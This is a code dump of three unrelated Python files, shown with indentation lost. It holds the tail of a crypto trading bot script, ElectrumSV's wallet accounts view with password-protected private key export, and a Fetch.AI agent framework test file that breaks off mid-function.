SIGNALLING_MODULES = parsed_config['trading_options']['SIGNALLING_MODULES']
if DEBUG_SETTING or args.debug:
DEBUG = True
# Load creds for correct environment
access_key, secret_key = load_correct_creds(parsed_creds)
if DEBUG:
print(f'loaded config below\n{json.dumps(parsed_config, indent=4)}')
print(f'Your credentials have been loaded from {creds_file}')
# Authenticate with the client
client = Client(access_key, secret_key)
# Use CUSTOM_LIST symbols if CUSTOM_LIST is set to True
if CUSTOM_LIST: tickers=[line.strip() for line in open('tickers.txt')]
# try to load all the coins bought by the bot if the file exists and is not empty
coins_bought = {}
# path to the saved coins_bought file
coins_bought_file_path = 'coins_bought.json'
# rolling window of prices; cyclical queue
historical_prices = [None] * (TIME_DIFFERENCE * RECHECK_INTERVAL)
hsp_head = -1
# prevent including a coin in volatile_coins if it has already appeared there less than TIME_DIFFERENCE minutes ago
volatility_cooloff = {}
# use separate files for testing and live trading
if TEST_MODE:
coins_bought_file_path = 'test_' + coins_bought_file_path
# if saved coins_bought json file exists and it's not empty then load it
if os.path.isfile(coins_bought_file_path) and os.stat(coins_bought_file_path).st_size != 0:
with open(coins_bought_file_path) as file:
coins_bought = json.load(file)
print('Press Ctrl-Q to stop the script')
if not TEST_MODE:
print('WARNING: You are using the Mainnet and live funds. Waiting 30 seconds as a security measure')
time.sleep(30)
# load signalling modules
for module in SIGNALLING_MODULES:
mymodule[module] = importlib.import_module(module)
t = threading.Thread(target=mymodule[module].do_work, args=())
t.start()
# seed initial prices
get_price()
while True:
orders, last_price, volume = buy()
update_portfolio(orders, last_price, volume)
coins_sold = sell_coins()
remove_from_portfolio(coins_sold)
|
accounts_view.py
|
import csv
from functools import partial
import json
import os
import threading
import time
from typing import List, Optional, Sequence
import weakref
from PyQt5.QtCore import QEvent, QItemSelectionModel, QModelIndex, pyqtSignal, QSize, Qt
from PyQt5.QtGui import QPainter, QPaintEvent
from PyQt5.QtWidgets import (QLabel, QListWidget, QListWidgetItem, QMenu, QSplitter, QTabWidget,
QTextEdit, QVBoxLayout)
from electrumsv.bitcoin import address_from_string, script_template_to_string
from electrumsv.constants import AccountType, DerivationType, KeystoreType
from electrumsv.i18n import _
from electrumsv.logs import logs
from electrumsv.wallet import AbstractAccount, MultisigAccount, Wallet
from .account_dialog import AccountDialog
from .main_window import ElectrumWindow
from .util import (Buttons, CancelButton, filename_field, line_dialog, MessageBox, OkButton,
protected, read_QIcon, WindowModalDialog)
class AccountsView(QSplitter):
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, main_window: ElectrumWindow, wallet: Wallet) -> None:
super().__init__(main_window)
self._logger = logs.get_logger("accounts-view")
self._main_window = weakref.proxy(main_window)
self._wallet = wallet
self._main_window.account_created_signal.connect(self._on_account_created)
self._main_window.account_change_signal.connect(self._on_account_changed)
# We subclass QListWidget so accounts cannot be deselected.
class CustomListWidget(QListWidget):
def selectionCommand(self, index: QModelIndex, event: Optional[QEvent]) \
-> QItemSelectionModel.SelectionFlags:
flags = super().selectionCommand(index, event)
if flags == QItemSelectionModel.Deselect:
return QItemSelectionModel.NoUpdate
return flags
def paintEvent(self, event: QPaintEvent) -> None:
super().paintEvent(event)
if self.count() > 0:
return
painter = QPainter(self.viewport())
painter.drawText(self.rect(), Qt.AlignCenter, _("Add your first account.."))
self._account_ids: List[int] = []
self._tab_widget = QTabWidget()
self._selection_list = CustomListWidget()
self._selection_list.setMinimumWidth(150)
self._selection_list.setIconSize(QSize(32, 32))
self._selection_list.setContextMenuPolicy(Qt.CustomContextMenu)
self._selection_list.customContextMenuRequested.connect(self._show_account_menu)
self._selection_list.currentItemChanged.connect(self._on_current_item_changed)
self._current_account_id: Optional[int] = None
self.addWidget(self._selection_list)
self.addWidget(self._tab_widget)
self.setChildrenCollapsible(False)
def on_wallet_loaded(self) -> None:
self._initialize_account_list()
def init_geometry(self, sizes: Optional[Sequence[int]]=None) -> None:
self._logger.debug("init_geometry.1 %r", sizes)
if sizes is None:
sizes = [ 200, self._main_window.size().width() - 200 ]
self._logger.debug("init_geometry.2 %r", sizes)
self.setSizes(sizes)
def _on_account_created(self, new_account_id: int, new_account: AbstractAccount) -> None:
# It should be made the active wallet account and followed up with the change event.
self._add_account_to_list(new_account)
def _on_account_changed(self, new_account_id: int, new_account: AbstractAccount) -> None:
# The list is being told what to focus on.
if self._update_active_account(new_account_id):
row = self._account_ids.index(new_account_id)
self._selection_list.setCurrentRow(row)
def _on_current_item_changed(self, item: QListWidgetItem, last_item: QListWidgetItem) -> None:
account_id = item.data(Qt.UserRole)
# This should update the internal tracking, and also the active wallet account.
if self._update_active_account(account_id):
account = self._main_window._wallet.get_account(account_id)
self._update_window_account(account)
def _update_active_account(self, account_id: int) -> bool:
if account_id == self._current_account_id:
return False
self._current_account_id = account_id
return True
def _update_window_account(self, account: AbstractAccount) -> None:
self._main_window.set_active_account(account)
def get_tab_widget(self) -> QTabWidget:
return self._tab_widget
def _initialize_account_list(self) -> None:
self._selection_list.clear()
self._account_ids.clear()
# TODO(rt12): These should respect user ordering, and perhaps also later hierarchy.
for account in self._wallet.get_accounts():
self._add_account_to_list(account)
if len(self._account_ids):
self._selection_list.setCurrentRow(0)
currentItem = self._selection_list.currentItem()
account_id = currentItem.data(Qt.UserRole)
if self._update_active_account(account_id):
account = self._main_window._wallet.get_account(account_id)
self._update_window_account(account)
def _add_account_to_list(self, account: AbstractAccount) -> None:
account_id = account.get_id()
item = QListWidgetItem()
keystore = account.get_keystore()
derivation_type = keystore.derivation_type if keystore is not None \
else DerivationType.NONE
is_watching_only = keystore.is_watching_only() if keystore is not None else True
icon_state = "inactive" if is_watching_only else "active"
if derivation_type == DerivationType.ELECTRUM_MULTISIG:
tooltip_text = _("Multi-signature account")
icon_filename = "icons8-group-task-80-blueui-{}.png"
elif derivation_type == DerivationType.HARDWARE:
tooltip_text = _("Hardware wallet account")
icon_filename = "icons8-usb-2-80-blueui-{}.png"
elif derivation_type == DerivationType.IMPORTED:
# This should not be watch only as imported public keys have no keystore.
tooltip_text = _("Imported private key account")
icon_filename = "icons8-key-80-plus-blueui-{}.png"
elif derivation_type == DerivationType.ELECTRUM_OLD:
tooltip_text = _("Old-style Electrum account")
icon_filename = "icons8-password-1-80-blueui-{}.png"
elif derivation_type == DerivationType.BIP32:
tooltip_text = _("BIP32 account")
icon_filename ="icons8-grand-master-key-80-blueui-{}.png"
else:
# This should always be watch only as imported public keys have no keystore.
tooltip_text = _("Imported public key account")
icon_filename = "icons8-key-80-plus-blueui-{}.png"
if is_watching_only:
tooltip_text += f" ({_('watch only')})"
item.setIcon(read_QIcon(icon_filename.format(icon_state)))
item.setData(Qt.UserRole, account_id)
item.setText(account.display_name())
item.setToolTip(tooltip_text)
self._selection_list.addItem(item)
self._account_ids.append(account_id)
def _show_account_menu(self, position) -> None:
item = self._selection_list.currentItem()
if not item:
return
account_id = item.data(Qt.UserRole)
account = self._wallet.get_account(account_id)
menu = QMenu()
self.add_menu_items(menu, account, self._main_window)
menu.exec_(self._selection_list.viewport().mapToGlobal(position))
def add_menu_items(self, menu: QMenu, account: AbstractAccount, main_window: ElectrumWindow) \
-> None:
menu.clear()
# This expects a reference to the main window, not the weakref.
account_id = account.get_id()
menu.addAction(_("&Information"),
partial(self._show_account_information, account_id))
seed_menu = menu.addAction(_("View &Secured Data"),
partial(self._view_secured_data, main_window=main_window, account_id=account_id))
seed_menu.setEnabled(
not account.is_watching_only() and not isinstance(account, MultisigAccount) \
and not account.is_hardware_wallet() \
and account.type() != AccountType.IMPORTED_PRIVATE_KEY)
menu.addAction(_("&Rename"),
partial(self._rename_account, account_id))
menu.addSeparator()
private_keys_menu = menu.addMenu(_("&Private keys"))
import_menu = private_keys_menu.addAction(_("&Import"), partial(self._import_privkey,
main_window=main_window, account_id=account_id))
import_menu.setEnabled(account.can_import_privkey())
export_menu = private_keys_menu.addAction(_("&Export"), partial(self._export_privkeys,
main_window=main_window, account_id=account_id))
export_menu.setEnabled(account.can_export())
if account.can_import_address():
menu.addAction(_("Import addresses"), partial(self._import_addresses, account_id))
menu.addSeparator()
hist_menu = menu.addMenu(_("&History"))
hist_menu.addAction("Export", main_window.export_history_dialog)
labels_menu = menu.addMenu(_("&Labels"))
action = labels_menu.addAction(_("&Import"),
partial(self._on_menu_import_labels, account_id))
labels_menu.addAction(_("&Export"), partial(self._on_menu_export_labels, account_id))
invoices_menu = menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), partial(self._on_menu_import_invoices, account_id))
payments_menu = menu.addMenu(_("Payments"))
ed_action = payments_menu.addAction(_("Export destinations"),
partial(self._generate_destinations, account_id))
keystore = account.get_keystore()
ed_action.setEnabled(keystore is not None and
keystore.type() != KeystoreType.IMPORTED_PRIVATE_KEY)
def _on_menu_import_labels(self, account_id: int) -> None:
self._main_window.do_import_labels(account_id)
def _on_menu_export_labels(self, account_id: int) -> None:
self._main_window.do_export_labels(account_id)
def _on_menu_import_invoices(self, account_id: int) -> None:
send_view = self._main_window.get_send_view(account_id)
send_view.import_invoices()
def _rename_account(self, account_id: int) -> None:
account = self._main_window._wallet.get_account(self._current_account_id)
new_account_name = line_dialog(self, _("Rename account"), _("Account name"), _("OK"),
account.get_name())
if new_account_name is None:
return
account.set_name(new_account_name)
account_row = self._account_ids.index(account_id)
item: QListWidgetItem = self._selection_list.item(account_row)
item.setText(new_account_name)
def _show_account_information(self, account_id: int) -> None:
dialog = AccountDialog(self._main_window, self._wallet, account_id, self)
dialog.exec_()
def _generate_destinations(self, account_id) -> None:
from . import payment_destinations_dialog
from importlib import reload
reload(payment_destinations_dialog)
dialog = payment_destinations_dialog.PaymentDestinationsDialog(self._main_window,
self._wallet, account_id, self)
dialog.exec_()
def _can_view_secured_data(self, account: AbstractAccount) -> bool:
return not account.is_watching_only() and not isinstance(account, MultisigAccount) \
and not account.is_hardware_wallet()
@protected
def _view_secured_data(self, main_window: ElectrumWindow, account_id: int=-1,
password: Optional[str]=None) -> None:
# account_id is a keyword argument so that 'protected' can identify the correct wallet
# window to do the password request in the context of.
account = self._wallet.get_account(account_id)
if self._can_view_secured_data(account):
keystore = account.get_keystore()
from .secured_data_dialog import SecuredDataDialog
d = SecuredDataDialog(self._main_window, self, keystore, password)
d.exec_()
else:
MessageBox.show_message(_("This type of account has no secured data. You are advised "
"to manually back up this wallet."), self._main_window.reference())
@protected
def _import_privkey(self, main_window: ElectrumWindow, account_id: int=-1,
password: Optional[str]=None) -> None:
# account_id is a keyword argument so that 'protected' can identify the correct wallet
# window to do the password request in the context of.
account = self._wallet.get_account(account_id)
title, msg = _('Import private keys'), _("Enter private keys")
self._main_window._do_import(title, msg,
lambda x: account.import_private_key(x, password))
def _import_addresses(self, account_id: int) -> None:
account = self._wallet.get_account(account_id)
title, msg = _('Import addresses'), _("Enter addresses")
def import_addr(addr):
address = address_from_string(addr)
if account.import_address(address):
return addr
# Show duplicate addition same as good addition.
return addr
self._main_window._do_import(title, msg, import_addr)
@protected
def _export_privkeys(self, main_window: ElectrumWindow, account_id: int=-1,
password: Optional[str]=None) -> None:
account = self._wallet.get_account(account_id)
if isinstance(self._wallet, MultisigAccount):
MessageBox.show_message(
_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.')
)
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "\n".join([
_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties.")
])
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrumsv-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(main_window.config, defaultname,
select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
keyinstance_ids = account.get_keyinstance_ids()
done = False
cancelled = False
def privkeys_thread():
for keyinstance_id in keyinstance_ids:
time.sleep(0.1)
if done or cancelled:
break
privkey = account.export_private_key(keyinstance_id, password)
script_template = account.get_script_template_for_id(keyinstance_id)
script_text = script_template_to_string(script_template)
private_keys[script_text] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join('{}\t{}'.format(script_text, privkey)
for script_text, privkey in private_keys.items())
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText(
"Please wait... %d/%d" % (len(private_keys),len(keyinstance_ids))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self._do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("ElectrumSV was unable to produce a private key-export."),
str(reason)
])
MessageBox.show_error(txt, title=_("Unable to create csv"))
except Exception as e:
MessageBox.show_message(str(e), main_window.reference())
return
MessageBox.show_message(_('Private keys exported'), main_window.reference())
def _do_export_privkeys(self, fileName: str, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["reference", "private_key"])
for key_text, pk in pklist.items():
transaction.writerow([key_text, pk])
else:
f.write(json.dumps(pklist, indent = 4))
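# Hedged note on the export formats above (the keys and values shown are illustrative): with
# the CSV option checked the file starts with a "reference,private_key" header followed by one
# row per key, e.g.
#
#   reference,private_key
#   <script text>,<private key WIF>
#
# otherwise the same mapping is written as indented JSON via json.dumps(pklist, indent=4).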
|
test_aea.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests for aea/aea.py."""
import os
import tempfile
import time
import unittest
from pathlib import Path
from threading import Thread
from typing import Callable
from unittest.case import TestCase
from unittest.mock import MagicMock, PropertyMock, patch
import pytest
import aea # noqa: F401
from aea.aea import AEA
from aea.aea_builder import AEABuilder
from aea.configurations.base import SkillConfig
from aea.configurations.constants import DEFAULT_LEDGER, DEFAULT_PRIVATE_KEY_FILE
from aea.crypto.wallet import Wallet
from aea.exceptions import AEAActException, AEAException, AEAHandleException
from aea.helpers.base import cd
from aea.helpers.exception_policy import ExceptionPolicyEnum
from aea.identity.base import Identity
from aea.mail.base import Envelope
from aea.protocols.base import Protocol
from aea.registries.resources import Resources
from aea.runtime import RuntimeStates
from aea.skills.base import Skill, SkillContext
from packages.fetchai.connections.local.connection import LocalNode, OEFLocalConnection
from packages.fetchai.protocols.default.message import DefaultMessage
from packages.fetchai.protocols.default.serialization import DefaultSerializer
from packages.fetchai.protocols.fipa.message import FipaMessage
from tests.common.utils import (
AeaTool,
make_behaviour_cls_from_funcion,
make_handler_cls_from_funcion,
run_in_thread,
timeit_context,
wait_for_condition,
)
from tests.conftest import (
CUR_PATH,
FETCHAI_PRIVATE_KEY_PATH,
ROOT_DIR,
UNKNOWN_PROTOCOL_PUBLIC_ID,
_make_local_connection,
)
from tests.data.dummy_aea.skills.dummy.tasks import DummyTask # type: ignore
from tests.data.dummy_skill import PUBLIC_ID as DUMMY_SKILL_PUBLIC_ID
from tests.data.dummy_skill.behaviours import DummyBehaviour # type: ignore
def test_setup_aea():
"""Tests the initialisation of the AEA."""
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
builder = AEABuilder()
builder.set_name("my_name").add_private_key(DEFAULT_LEDGER, private_key_path)
my_AEA = builder.build()
assert my_AEA.context == my_AEA._context, "Cannot access the Agent's Context"
assert (
not my_AEA.context.connection_status.is_connected
), "AEA should not be connected."
my_AEA.setup()
assert my_AEA.resources is not None, "Resources must not be None after setup"
my_AEA.resources = Resources()
assert my_AEA.resources is not None, "Resources must not be None after set"
assert (
my_AEA.context.shared_state is not None
), "Shared state must not be None after set"
assert my_AEA.context.task_manager is not None
assert my_AEA.context.identity is not None, "Identity must not be None after set."
my_AEA.teardown()
def test_act():
"""Tests the act function of the AEA."""
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, private_key_path)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
agent = builder.build()
with run_in_thread(agent.start, timeout=20):
wait_for_condition(lambda: agent.is_running, timeout=20)
behaviour = agent.resources.get_behaviour(DUMMY_SKILL_PUBLIC_ID, "dummy")
time.sleep(1)
wait_for_condition(lambda: behaviour.nb_act_called > 0, timeout=20)
agent.stop()
def test_start_stop():
"""Tests the act function of the AEA."""
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, private_key_path)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
agent = builder.build()
with run_in_thread(agent.start, timeout=20):
wait_for_condition(lambda: agent.is_running, timeout=20)
agent.stop()
def test_double_start():
"""Tests the act function of the AEA."""
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, private_key_path)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
agent = builder.build()
with run_in_thread(agent.start, timeout=20):
try:
wait_for_condition(lambda: agent.is_running, timeout=20)
t = Thread(target=agent.start)
t.start()
time.sleep(1)
assert not t.is_alive()
finally:
agent.stop()
t.join()
def test_react():
"""Tests income messages."""
with LocalNode() as node:
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, private_key_path)
builder.add_protocol(
Path(ROOT_DIR, "packages", "fetchai", "protocols", "oef_search")
)
builder.add_connection(
Path(ROOT_DIR, "packages", "fetchai", "connections", "local")
)
local_connection_id = OEFLocalConnection.connection_id
builder.set_default_connection(local_connection_id)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
agent = builder.build(connection_ids=[local_connection_id])
# This is a temporary workaround to feed the local node to the OEF Local connection
# TODO remove it.
local_connection = agent.resources.get_connection(local_connection_id)
local_connection._local_node = node
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
msg.to = agent.identity.address
msg.sender = agent.identity.address
envelope = Envelope(to=msg.to, sender=msg.sender, message=msg,)
with run_in_thread(agent.start, timeout=20, on_exit=agent.stop):
wait_for_condition(lambda: agent.is_running, timeout=20)
agent.outbox.put(envelope)
default_protocol_public_id = DefaultMessage.protocol_id
dummy_skill_public_id = DUMMY_SKILL_PUBLIC_ID
handler = agent.resources.get_handler(
default_protocol_public_id, dummy_skill_public_id
)
assert handler is not None, "Handler is not set."
wait_for_condition(
lambda: len(handler.handled_messages) > 0,
timeout=20,
error_msg="The message is not inside the handled_messages.",
)
def test_handle():
"""Tests handle method of an agent."""
with LocalNode() as node:
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, private_key_path)
builder.add_protocol(Path(ROOT_DIR, "packages", "fetchai", "protocols", "fipa"))
builder.add_protocol(
Path(ROOT_DIR, "packages", "fetchai", "protocols", "oef_search")
)
builder.add_connection(
Path(ROOT_DIR, "packages", "fetchai", "connections", "local")
)
local_connection_id = OEFLocalConnection.connection_id
builder.set_default_connection(local_connection_id)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
an_aea = builder.build(connection_ids=[local_connection_id])
# This is a temporary workaround to feed the local node to the OEF Local connection
# TODO remove it.
local_connection = an_aea.resources.get_connection(local_connection_id)
local_connection._local_node = node
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
msg.to = an_aea.identity.address
msg.sender = an_aea.identity.address
encoded_msg = DefaultSerializer.encode(msg)
error_handler = an_aea._error_handler
with run_in_thread(an_aea.start, timeout=5):
wait_for_condition(lambda: an_aea.is_running, timeout=10)
dummy_skill = an_aea.resources.get_skill(DUMMY_SKILL_PUBLIC_ID)
dummy_handler = dummy_skill.skill_context.handlers.dummy
# UNSUPPORTED PROTOCOL
envelope = Envelope(to=msg.to, sender=msg.sender, message=msg,)
envelope._protocol_specification_id = UNKNOWN_PROTOCOL_PUBLIC_ID
# send envelope via localnode back to agent/bypass `outbox` put consistency checks
assert error_handler.unsupported_protocol_count == 0
an_aea.outbox.put(envelope)
wait_for_condition(
lambda: error_handler.unsupported_protocol_count == 1, timeout=2,
)
# DECODING ERROR
envelope = Envelope(
to=an_aea.identity.address,
sender=an_aea.identity.address,
protocol_specification_id=DefaultMessage.protocol_specification_id,
message=b"",
)
assert error_handler.decoding_error_count == 0
an_aea.runtime.multiplexer.put(envelope)
wait_for_condition(
lambda: error_handler.decoding_error_count == 1, timeout=5,
)
# UNSUPPORTED SKILL
msg = FipaMessage(
performative=FipaMessage.Performative.ACCEPT,
message_id=1,
dialogue_reference=(str(0), ""),
target=0,
)
msg.to = an_aea.identity.address
msg.sender = an_aea.identity.address
envelope = Envelope(to=msg.to, sender=msg.sender, message=msg,)
# send envelope via localnode back to agent/bypass `outbox` put consistency checks
assert error_handler.no_active_handler_count == 0
an_aea.outbox.put(envelope)
wait_for_condition(
lambda: error_handler.no_active_handler_count == 1, timeout=5,
)
# DECODING OK
envelope = Envelope(
to=msg.to,
sender=msg.sender,
protocol_specification_id=DefaultMessage.protocol_specification_id,
message=encoded_msg,
)
# send envelope via localnode back to agent/bypass `outbox` put consistency checks
assert len(dummy_handler.handled_messages) == 0
an_aea.runtime.multiplexer.put(envelope)
wait_for_condition(
lambda: len(dummy_handler.handled_messages) == 1, timeout=5,
)
an_aea.stop()
def test_initialize_aea_programmatically():
"""Test that we can initialize an AEA programmatically."""
with LocalNode() as node:
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, private_key_path)
builder.add_protocol(
Path(ROOT_DIR, "packages", "fetchai", "protocols", "oef_search")
)
builder.add_connection(
Path(ROOT_DIR, "packages", "fetchai", "connections", "local")
)
local_connection_id = OEFLocalConnection.connection_id
builder.set_default_connection(local_connection_id)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
an_aea = builder.build(connection_ids=[local_connection_id])
local_connection = an_aea.resources.get_connection(local_connection_id)
local_connection._local_node = node
expected_message = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
expected_message.to = an_aea.identity.address
expected_message.sender = an_aea.identity.address
envelope = Envelope(
to=expected_message.to,
sender=expected_message.sender,
message=expected_message,
)
with run_in_thread(an_aea.start, timeout=5, on_exit=an_aea.stop):
wait_for_condition(lambda: an_aea.is_running, timeout=10)
an_aea.outbox.put(envelope)
dummy_skill_id = DUMMY_SKILL_PUBLIC_ID
dummy_behaviour_name = "dummy"
dummy_behaviour = an_aea.resources.get_behaviour(
dummy_skill_id, dummy_behaviour_name
)
wait_for_condition(lambda: dummy_behaviour is not None, timeout=10)
wait_for_condition(lambda: dummy_behaviour.nb_act_called > 0, timeout=10)
# TODO the previous code caused an error:
# _pickle.PicklingError: Can't pickle <class 'tasks.DummyTask'>: import of module 'tasks' failed
dummy_task = DummyTask()
task_id = an_aea.enqueue_task(dummy_task)
async_result = an_aea.get_task_result(task_id)
expected_result = async_result.get(10.0)
assert expected_result == 1
dummy_handler = an_aea.resources.get_handler(
DefaultMessage.protocol_id, dummy_skill_id
)
dummy_handler_alt = an_aea.resources._handler_registry.fetch(
(dummy_skill_id, "dummy")
)
wait_for_condition(lambda: dummy_handler == dummy_handler_alt, timeout=10)
wait_for_condition(lambda: dummy_handler is not None, timeout=10)
wait_for_condition(
lambda: len(dummy_handler.handled_messages) == 1, timeout=10
)
wait_for_condition(
lambda: dummy_handler.handled_messages[0] == expected_message,
timeout=10,
)
def test_initialize_aea_programmatically_build_resources():
"""Test that we can initialize the agent by building the resource object."""
try:
temp = tempfile.mkdtemp(prefix="test_aea_resources")
with LocalNode() as node:
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
wallet = Wallet({DEFAULT_LEDGER: private_key_path})
identity = Identity(agent_name, address=wallet.addresses[DEFAULT_LEDGER])
connection = _make_local_connection(agent_name, node)
resources = Resources()
default_protocol = Protocol.from_dir(
str(Path("packages", "fetchai", "protocols", "default"))
)
resources.add_protocol(default_protocol)
resources.add_connection(connection)
an_aea = AEA(
identity,
wallet,
resources=resources,
data_dir=MagicMock(),
default_connection=connection.public_id,
)
error_skill = Skill.from_dir(
str(Path("packages", "fetchai", "skills", "error")),
agent_context=an_aea.context,
)
dummy_skill = Skill.from_dir(
str(Path(CUR_PATH, "data", "dummy_skill")), agent_context=an_aea.context
)
resources.add_skill(dummy_skill)
resources.add_skill(error_skill)
expected_message = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
expected_message.to = agent_name
expected_message.sender = agent_name
with run_in_thread(an_aea.start, timeout=5, on_exit=an_aea.stop):
wait_for_condition(lambda: an_aea.is_running, timeout=10)
an_aea.outbox.put(
Envelope(
to=agent_name, sender=agent_name, message=expected_message,
)
)
dummy_skill_id = DUMMY_SKILL_PUBLIC_ID
dummy_behaviour_name = "dummy"
dummy_behaviour = an_aea.resources.get_behaviour(
dummy_skill_id, dummy_behaviour_name
)
wait_for_condition(lambda: dummy_behaviour is not None, timeout=10)
wait_for_condition(
lambda: dummy_behaviour.nb_act_called > 0, timeout=10
)
dummy_task = DummyTask()
task_id = an_aea.enqueue_task(dummy_task)
async_result = an_aea.get_task_result(task_id)
expected_result = async_result.get(10.0)
assert expected_result == 1
dummy_handler_name = "dummy"
dummy_handler = an_aea.resources._handler_registry.fetch(
(dummy_skill_id, dummy_handler_name)
)
dummy_handler_alt = an_aea.resources.get_handler(
DefaultMessage.protocol_id, dummy_skill_id
)
wait_for_condition(
lambda: dummy_handler == dummy_handler_alt, timeout=10
)
wait_for_condition(lambda: dummy_handler is not None, timeout=10)
wait_for_condition(
lambda: len(dummy_handler.handled_messages) == 1, timeout=10
)
wait_for_condition(
lambda: dummy_handler.handled_messages[0] == expected_message,
timeout=10,
)
finally:
Path(temp).rmdir()
def test_add_behaviour_dynamically():
"""Test that we can add a behaviour dynamically."""
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
wallet = Wallet({DEFAULT_LEDGER: private_key_path})
data_dir = MagicMock()
resources = Resources()
identity = Identity(agent_name, address=wallet.addresses[DEFAULT_LEDGER])
connection = _make_local_connection(identity.address, LocalNode())
resources.add_connection(connection)
agent = AEA(
identity, wallet, resources, data_dir, default_connection=connection.public_id,
)
resources.add_component(
Skill.from_dir(
Path(CUR_PATH, "data", "dummy_skill"), agent_context=agent.context
)
)
for skill in resources.get_all_skills():
skill.skill_context.set_agent_context(agent.context)
dummy_skill_id = DUMMY_SKILL_PUBLIC_ID
old_nb_behaviours = len(agent.resources.get_behaviours(dummy_skill_id))
with run_in_thread(agent.start, timeout=5, on_exit=agent.stop):
wait_for_condition(lambda: agent.is_running, timeout=10)
dummy_skill = agent.resources.get_skill(dummy_skill_id)
wait_for_condition(lambda: dummy_skill is not None, timeout=10)
new_behaviour = DummyBehaviour(
name="dummy2", skill_context=dummy_skill.skill_context
)
dummy_skill.skill_context.new_behaviours.put(new_behaviour)
wait_for_condition(lambda: new_behaviour.nb_act_called > 0, timeout=10)
wait_for_condition(
lambda: len(agent.resources.get_behaviours(dummy_skill_id))
== old_nb_behaviours + 1,
timeout=10,
)
def test_no_handlers_registered():
"""Test no handlers are registered for message processing."""
agent_name = "MyAgent"
builder = AEABuilder()
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, private_key_path)
an_aea = builder.build()
with patch.object(an_aea.logger, "warning") as mock_logger:
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
msg.to = an_aea.identity.address
envelope = Envelope(
to=an_aea.identity.address, sender=an_aea.identity.address, message=msg,
)
with patch(
"aea.registries.filter.Filter.get_active_handlers",
new_callable=PropertyMock,
):
with patch.object(
